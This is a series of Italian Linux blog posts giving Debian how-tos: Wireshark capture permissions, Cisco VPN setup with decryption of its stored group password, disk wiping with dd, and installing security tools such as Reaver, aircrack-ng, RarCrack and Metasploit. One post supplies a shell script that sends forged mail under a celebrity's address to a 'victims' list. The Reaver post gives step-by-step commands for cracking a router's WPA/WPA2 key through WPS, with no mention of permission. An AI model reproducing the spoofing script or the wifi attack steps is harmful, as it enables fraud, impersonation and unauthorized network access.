Wireshark abilitare interfacce di rete

 

wireshark abilitare interfacce di rete

 

Wireshark abilitare interfacce di rete. In questa guida verranno descritti i passaggi per abilitare le interfacce di rete in  wireshark Dopo avere avviato il programma bisogna andare in Capture-Options per scegliere l'interfaccia di rete per lo sniffing, ma di default queste non compaiono su Debian. Per abilitarle:

sudo apt-get install wireshark libcap2-bin
sudo groupadd wireshark
sudo usermod -a -G wireshark $USER
sudo chgrp wireshark /usr/bin/dumpcap
sudo chmod 755 /usr/bin/dumpcap
sudo setcap cap_net_raw,cap_net_admin=eip /usr/bin/dumpcap

a questo punto saranno visibili nel menu Capture-Options.

enjoy 😉

 

Cisco VPN client su Debian Wheezy

 

Guida per installare Cisco VPN client su Debian Wheezy ed allo stesso tempo decriptare la password segreta contenuta nel certificato.pcf, che potrà servire per esempio per creare una vpn su iphone, dove c'è bisogno di scrivere la password a mano. I programmi che ci servono sono: vpnc, cisco-decrypt e pcf2vpnc.

 

$ mkdir ciscovpn
$ cd ciscovpn
$ wget https://www.unix-ag.uni-kl.de/~massar/soft/cisco-decrypt.c
$ sudo apt-get install vpnc libgcrypt11-dev
$ gcc -Wall -o cisco-decrypt cisco-decrypt.c $(libgcrypt-config --libs --cflags)
$ chmod +x cisco-decrypt
$ sudo cp cisco-decrypt /usr/bin
$ wget https://svn.unix-ag.uni-kl.de/vpnc/trunk/pcf2vpnc
$ sudo chmod +x pcf2vpnc
$ sudo cp pcf2vpnc /usr/bin

 

Usare il certificato.pcf in vostro possesso:

 

$ sudo pcf2vpnc certificato.pcf lavorovpn.conf

 

non fare caso agli errori:

 

decoding input: No such file or directory
sh: 1: Us3r: not found
decoding input: No such file or directory
vpnc config written to 'lavorovpn.conf' with permissions '100644'.
Please take care of permissions.

 

quindi copiare il file.conf creato in /etc/vpc/ per poterlo poi usare:

 

$ sudo cp lavorovpn.conf  /etc/vpnc/

 

per avviare:

 

$ sudo vpnc lavorovpn

 

per stoppare:

 

$ sudo vpnc-disconnect

 

Questo è tutto.

 

 

(Cracking) Wifite e Reaver nei repository di Debian Sid

 

 

 

Non so quanto è vecchia la notizia, ma siccome mi sono assentato per quasi due mesi dal blog, nei quali non ho seguito nulla, mi sono accorto adesso di alcune novità. Alcuni strumenti utili per il cracking sulle reti wifi, sono stati introdotti nei repository di Debian Sid. Parlo nello specifico di Wifite e di Reaver, ed ho notato che la versione di aircrack-ng è alla versione 1.1-5. Di questi strumenti e sul loro utilizzo avevo parlato in passato, facendo anche delle guide. WifiteReaveraircrack-ng.

 

enjoy 😉

Exiftool su Debian Squeeze/Wheezy/Sid pacchetti Deb

 

Avevo già parlato in passato di Exiftool, uno strumento che serve ad estrarre tutti i dati exif da una foto. Nei repo ci sono sicuramente altri programmi per ottenere i dati exif, ma questo è quello che io uso da qualche anno ed ormai mi ci sono affezzionato. Nel mio repository si trovano i pacchetti pronti:

 

Download amd64

Download i386

 

enjoy 😉

Eliminare permanentemente tutti i dati di un disco

 

 

 

Negli ultimi periodi capita di avere chiavette usb o hard disk in abbondanza, e quindi di non riuscire più ad utilizzarli. Può capitare di regalare o vendere queste unità disco, e per una questione di sicurezza, sarebbe meglio fare in modo che nessuno si diverta a recuperare qualche dato personale. E' stato dimostrato che più del 30% dei pc connessi ad internet quotidianamente, naviga su siti porno, salvando foto e video zozzi, come fa Picchiopc. Quindi l'obiettivo è quello di rendere la vita difficile a chi vuole sbirciare nelle abitudini altrui 🙂 Una volta identificato il disco da formattare, il comando è semplice:

 

$ sudo dd if=/dev/zero of=/dev/sdX

 

 

enjoy 😉

Inviare mail VIP (false) su Debian e Gnu/Linux

 

 

 

$ sudo apt-get install postfix mime-construct

$ cd /bin

$ sudo nano falsamail.sh

ed inserire:

# Invio di mail con account falsi
cat vittime.txt | { while read; do
  mime-construct --header 'Sender: sharon_stone@hollywood.com' --header 'From: sharon_stone@hollywood.com' --to $REPLY --subject 'I am going' --file testofalso.txt
  sleep 2
done
}

 

 

$ sudo chmod +x falsamail.sh

$ sudo nano vittime.txt

 

quindi inserire la mail della vittima. Poi inserire il testo da inviare all'interno di:

 

$ sudo nano testofalso.txt

:

inviare:

 

$ ./falsamail.sh

 

enjoy 😉

Reaver WPS su Debian e cracking password WPA/WPA2 in meno di 12 ore

 

 

 

Reaver WPS riesce con un attaco brute force a decifrare la password wpa/wpa2 della nostra rete, in determinate condizioni. Prima di tutto il WPS o Wi-Fi Protected Setup è diffuso nei router domestici, in genere lo si trova sotto la voce wifi-protezione. La vulnerabilità si nasconde prorpio in questo standard, in quanto, se si utilizza la modalità di inserimento pin al posto del push button, questa apre una falla. Praticamente bombardando il router di  pacchetti, questo restituisce molte informazioni utili al cracking. Comunque in rete si trovano spiegazioni più esaustive e dettagliate. Come prima cosa bisogna installare aircrack-ng, e compilarselo, dato che non è più presente nei repository ufficiali, oppure prelevarlo dal mio repository. Per avere quindi reaver su Debian:

 

$ sudo apt-get install libpcap0.8-dev libsqlite3-dev

$ wget 

$ tar -xvf reaver-1.3.tar.gz

$ cd reaver-1.3/src/

$ ./configure

$ make

$ sudo make install

 

mettere in monitor mode la scheda:

 

# airmon-ng start wlan0

 

il comando sopra creerà mon0 in monitor mode

 

Interface    Chipset        Driver

wlan0        Ralink 2561 PCI    rt61pci – [phy0]
                (monitor mode enabled on mon0
)

 

scanning per rilevare reti wpa:

 

# walsh -i mon0 --ignore-fcs

 

attacco:

 

# reaver -i mon0 -b 00:11:22:33:44:55 --dh-small

 

per altri comandi leggere la documentazione all'interno del pacchetto.

 

enjoy 😉

(Errori) Installare Aircrack-ng su Debian Sid

 

 

 

 

Trovandomi ad installare Aircrck-ng, con il classico metodo, ho avuto un sacco di errori:

 

 

edmond@Debianbox:~/aircrack-ng-1.1$ make
make -C src all
make[1]: Entering directory `/home/edmond/aircrack-ng-1.1/src'
make -C osdep
make[2]: Entering directory `/home/edmond/aircrack-ng-1.1/src/osdep'
Building for Linux
make[3]: Entering directory `/home/edmond/aircrack-ng-1.1/src/osdep'
gcc -g -W -Wall -Werror -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=0  -fPIC -I..    -c -o osdep.o osdep.c
gcc -g -W -Wall -Werror -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=0  -fPIC -I..    -c -o network.o network.c
gcc -g -W -Wall -Werror -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=0  -fPIC -I..    -c -o linux.o linux.c
linux.c: In function ‘is_ndiswrapper’:
linux.c:165:17: error: variable ‘unused’ set but not used [-Werror=unused-but-set-variable]
linux.c: In function ‘linux_set_rate’:
linux.c:334:22: error: variable ‘unused’ set but not used [-Werror=unused-but-set-variable]
linux.c: In function ‘linux_set_channel’:
linux.c:807:22: error: variable ‘unused’ set but not used [-Werror=unused-but-set-variable]
linux.c: In function ‘linux_set_freq’:
linux.c:896:22: error: variable ‘unused’ set but not used [-Werror=unused-but-set-variable]
linux.c: In function ‘set_monitor’:
linux.c:1022:22: error: variable ‘unused’ set but not used [-Werror=unused-but-set-variable]
linux.c: In function ‘do_linux_open’:
linux.c:1366:12: error: variable ‘unused_str’ set but not used [-Werror=unused-but-set-variable]
linux.c:1352:15: error: variable ‘unused’ set but not used [-Werror=unused-but-set-variable]
linux.c: In function ‘get_battery_state’:
linux.c:1982:35: error: variable ‘current’ set but not used [-Werror=unused-but-set-variable]
cc1: all warnings being treated as errors
make[3]: *** [linux.o] Error 1
make[3]: Leaving directory `/home/edmond/aircrack-ng-1.1/src/osdep'
make[2]: *** [all] Error 2
make[2]: Leaving directory `/home/edmond/aircrack-ng-1.1/src/osdep'
make[1]: *** [osd] Error 2
make[1]: Leaving directory `/home/edmond/aircrack-ng-1.1/src'
make: *** [all] Error 2

 

il problema è dovuto alla versionde di gcc, che è alla versione 4.6.2 (Debian 4.6.2-3), mentre aircrack-ng deve essere compilato con una versione precedente…io ho usato la 4.4, ma dovrebbe funzionare anche la 4.5.

 

# gcc -v

 

quindi non rimane che cambiare versione del compilatore. Se si usa il comando:

 

# update-alternatives --install /usr/bin/gcc gcc-4.4 /usr/bin/gcc-4.4 20

 

la risposta sarà:

 

root@Debianbox:/home/edmond# update-alternatives –install /usr/bin/gcc gcc-4.4 /usr/bin/gcc-4.4 20
update-alternatives: viene usato /usr/bin/gcc-4.4 per fornire /usr/bin/gcc (gcc-4.4) in modalità automatica.

 

per ritornare alla versione precedente, io ho usato:

 

# rm /usr/bin/gcc

# ln -sf /usr/bin/gcc-4.6 /usr/bin/gcc

 

Comunque il pacchetto deb si trova nel repository.

 

ps:ci sarebbe da mettere anche a posto /etc/alternatives/gcc

 

enjoy 😉

RarCrack su Debian Squeeze

 

 

RarCrack usa un algoritmo bruteforce per trovare la password di un archivio rar,zip,7z. Per una corretta compilazione su Debian Squeeze:

 

# apt-get install libxml2-dev build-essential

$ wget

$ tar -xjf rarcrack-0.2.tar.bz2

$ cd rarcrack-0.2

$ make

# make install

 

ipotizzando di avere un archivio compresso con password, chiamato file.rar, si può iniziare il cracking usando un comando simile:

 

# rarcrack file.rar --type rar --threads 5

 

dove i threads sono al massimo 12. La password "123" è stata trovata in 2 minuti circa.

 

GOOD: password cracked: '123'

real    2m15.301s

 

enjoy 😉

Installazione di Metasploit su Debian Squeeze

 

 

Metasploit Project è un progetto di sicurezza informatica che fornisce informazioni sulle vulnerabilità, semplifica le operazioni di penetration testing ed aiuta nello sviluppo di sistemi di rilevamento di intrusioni. Il sub-project più conosciuto è Metasploit Framework, uno strumento per lo sviluppo e l'esecuzione di exploit ai danni di una macchina remota. Altri sub-project importanti comprendono l'Opcode Database, l'archivio di shellcode e la ricerca nella sicurezza (Wikipedia) Ci sono diverse distribuzioni Linux che si occupano di testare la sicurezza di un sistema, tra cui la più famosa è sicuramente Backtrack. Ma Metasploit possiamo anche installarlo sulla nostra distro preferita, nel caso specifico Debian Squeeze.

 

Requisiti:

 

# apt-get install build-essential subversion ruby libruby irb rdoc libyaml-ruby libzlib-ruby libopenssl-ruby libdl-ruby libreadline-ruby libiconv-ruby rubygems sqlite3 libsqlite3-ruby libsqlite3-dev

 

Installazione:

 

$ svn co https://metasploit.com/svn/framework3/trunk/ metasploit

$ cd metasploit

$ svn up

 

avvio in modo console:

 

$ ./msfconsole

 

premere help per visionare ulteriori comandi. Per il momento mi fermo quà, in una prossima guida non escludo di proseguire con degli esempi di utilizzo.

 

enjoy 😉